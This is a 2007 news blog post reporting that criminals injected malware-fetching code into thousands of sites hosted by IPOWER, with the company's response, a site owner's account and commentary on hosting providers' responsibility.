Cyber Crooks Hijack Activities of Large Web-Hosting Firm
Organized crime groups have modified a significant share of the Web sites operated by one of the Internet's largest Web hosting companies to launch cyber attacks against visitors, Security Fix has learned.
Last month, Phoenix-based IPOWER Inc. was featured prominently in an unflattering report by StopBadware.org, a joint effort by Google, Harvard Law School's Berkman Center for Internet & Society and Oxford University's Internet Institute. StopBadware has identified more than 90,000 sites that attempt to install malicious software on visitors' computers via Internet browser security holes or programming tricks. When a user tries to click on one of these sites after they appear as Google search results, Google posts a warning page stating that the site has been spotted trying to attack previous visitors.
John Palfrey, a professor of Internet law at Harvard, said the report showed that about 90 percent of the sites flagged as serving "badware" appeared to be otherwise legitimate sites that had been hijacked by criminals.
"What we've seen is a growing and alarming trend where the majority of sites we're identifying [belong to individuals] who clearly have no intention of distributing badware," Palfrey said.
StopBadware found that about 10 percent of the sites in its database were operated by IPOWER. Security Fix found that the problem at IPOWER may be far worse than StopBadware indicated.
Like many other companies that offer low-cost Web site hosting services for about $5 to $10 per month, IPOWER hosts sites via "virtual servers." This allows multiple sites to be hosted using the same hardware. Virtual server setups are far more affordable than "dedicated" hosting services, where each Web site is assigned its own set of hardware.
Security Fix examined nine of IPOWER's virtual servers. They are identified in the chart to the left by the names assigned to them by IPOWER -- "CPanel1" through "CPanel8" and "Host16". These servers are home to at least 8,192 active Web sites, most of which appear to belong to individuals and small businesses. According to a Security Fix analysis, more than 2,650 of those sites -- or an average of 33 percent of all sites on each server -- included computer code designed to silently retrieve malicious software from a variety of online locations. Some of the download sites linked to in the unauthorized code were inactive at press time, while others were able to serve malicious software to visitors, most often in the form of spyware that steals passwords and financial data from a victim's PC.
IPOWER declined a phone interview for this story. But the company acknowledged in an e-mail that "over the past three months our servers were targeted. We take this situation very seriously and a diligent cleanup effort has been underway for many months already. We saw the StopBadware report on the day it came out and went to download the list to sweep it as quickly as possible. By looking at the list, it was evident that our cleanup efforts were already helping significantly. By the time we downloaded the list, there were already over a few thousand accounts less than what they claimed in their report."
IPOWER said the site hacks "came from a compromised server hosted by another company that was listed on the Stopbadware.org Web site. This impacted a higher percentage of accounts on each of these legacy third-party control panel systems."
The company claims to have more than 700,000 customers. If we assume for the moment the small segment of IPOWER servers Security Fix analyzed is fairly representative of a larger trend, IPOWER may well be home to nearly a quarter-million malicious Web sites.
Andy Gravina, a deejay from central Florida, first learned his site was infected three months ago when his anti-virus program alerted him that his own home page was trying to infect his computer with a virus.
Gravina said he contacted IPOWER about the malicious code. He said the company told him that it was his responsibility to maintain the security and integrity of his site.
"I said, 'Wait a minute, this Web page is housed on your servers, and it would seem you would have the responsibility to see that your servers are being checked with anti-virus programs'" Gravina recalled. "So the guy put me on hold and after a while he came back and said that the pages had been checked and that the offending code had been removed."
Gravina said he thought the problem had been taken care of, until he received a call from Security Fix notifying him that his site continued to host the malicious code.
While two of the malicious sites most commonly referenced by the compromised IPOWER servers were offline at the time of this publication, remote sites used to serve malicious software frequently go up and down as the attackers modify their operations, said Roger Thompson, chief research officer at Exploit Prevention Labs.
IPOWER declined to say exactly how the attackers infiltrated so many of its servers, or how long the malicious code has resided on infected sites.
"We are constantly responding and developing new measures to counter attacks and compromises from various off-shore hacking groups," the company said. "There are new attacks created from new sources every day. We can't control that. We can control how we handle them, and we are very proactive."
But a review of Gravina and McGovern's sites indicate that both virtual servers are running outdated, insecure versions of the Apache Web server software and PHP, a popular Web scripting language that many hosting companies provide for their customers.
The most recent version of PHP -- 4.4.7 -- has fixed more than five-dozen security holes since the version currently in use by IPOWER, PHP 4.4.2, which was first released nearly 16 months ago.
Large hosting providers should not be allowed to host tens of thousands of compromised sites for months at a time. There is little excuse for failing to apply long-overdue security updates to seal frequently targeted Web server software flaws, and no reason why hosting providers cannot keep closer tabs on the content being served by their customers.
An Internet service provider or Web host can take action within 48 hours if it receives a "takedown notice," under the Digital Millennium Copyright Act. The law protects network owners from copyright infringement liability, provided they take steps to promptly remove the infringing content. Yet ISPs and Web hosts often leave sites undisturbed for months that cooperate in stealing financial data and consumer identities.
There is no "notice and takedown" law specifically requiring ISPs and Web hosts to police their networks for sites that may serve malicious software. Security Fix readers - do you think that such a law would be useful or effective?
Service providers may be able to get better control of malicious activity on their networks if they made a more concerted effort to stratify abuse reports. For example, most ISPs and Web hosts have a single e-mail address for reporting suspicious, hostile or illegal behavior. It is usually something like "firstname.lastname@example.org." But consider the technicians who sift through those complaints for the truly serious ones. In all likelihood, the spam complaints will be the most numerous, followed by complaints about phishing and unauthorized network scanning. One method of improving response times to abuse reporting might be to have all phishing reports go to email@example.com, and all malicious software reports be sent to firstname.lastname@example.org, for example.
Update, 1:56 PM ET: A reader just alerted me to the inaugural post of Google's new Online Security Blog, which delves into the problem of hacked, legitimate sites serving up malicious software.
May 23, 2007; 10:30 AM ET
Categories: Fraud , From the Bunker , Latest Warnings , Safety Tips
Save & Share: Previous: Scammers Target Elderly With Aid of Data Brokers
Next: Phishing Attacks Soar as Scammer Nets Widen
Posted by: BelchSpeak | May 23, 2007 12:02 PM | Report abuse
Posted by: some guy | May 23, 2007 12:47 PM | Report abuse
Posted by: dude | May 23, 2007 1:20 PM | Report abuse
Posted by: DA | May 23, 2007 1:23 PM | Report abuse
Posted by: Ken L | May 23, 2007 3:58 PM | Report abuse
Posted by: Some Guy2 | May 23, 2007 4:07 PM | Report abuse
Posted by: TJ | May 23, 2007 4:40 PM | Report abuse
Posted by: TJ | May 23, 2007 4:44 PM | Report abuse
Posted by: Net Nazi | May 23, 2007 5:57 PM | Report abuse
Posted by: suzi | May 23, 2007 9:57 PM | Report abuse
Posted by: Julio C. | May 24, 2007 10:17 AM | Report abuse
Posted by: Sean D. | May 24, 2007 12:16 PM | Report abuse
Posted by: dijit44 | May 24, 2007 2:28 PM | Report abuse
Posted by: hhhobbit | May 24, 2007 10:21 PM | Report abuse
Posted by: hhhobbit | May 24, 2007 11:10 PM | Report abuse
Posted by: BadBusiness | May 25, 2007 10:20 AM | Report abuse
Posted by: whpromo | May 25, 2007 12:39 PM | Report abuse
Posted by: meyerc13 | May 25, 2007 1:38 PM | Report abuse
Posted by: David | May 29, 2007 2:52 PM | Report abuse
Posted by: Tagesclaus | June 4, 2007 8:33 AM | Report abuse
Posted by: Mat | June 9, 2007 1:02 AM | Report abuse
The comments to this entry are closed.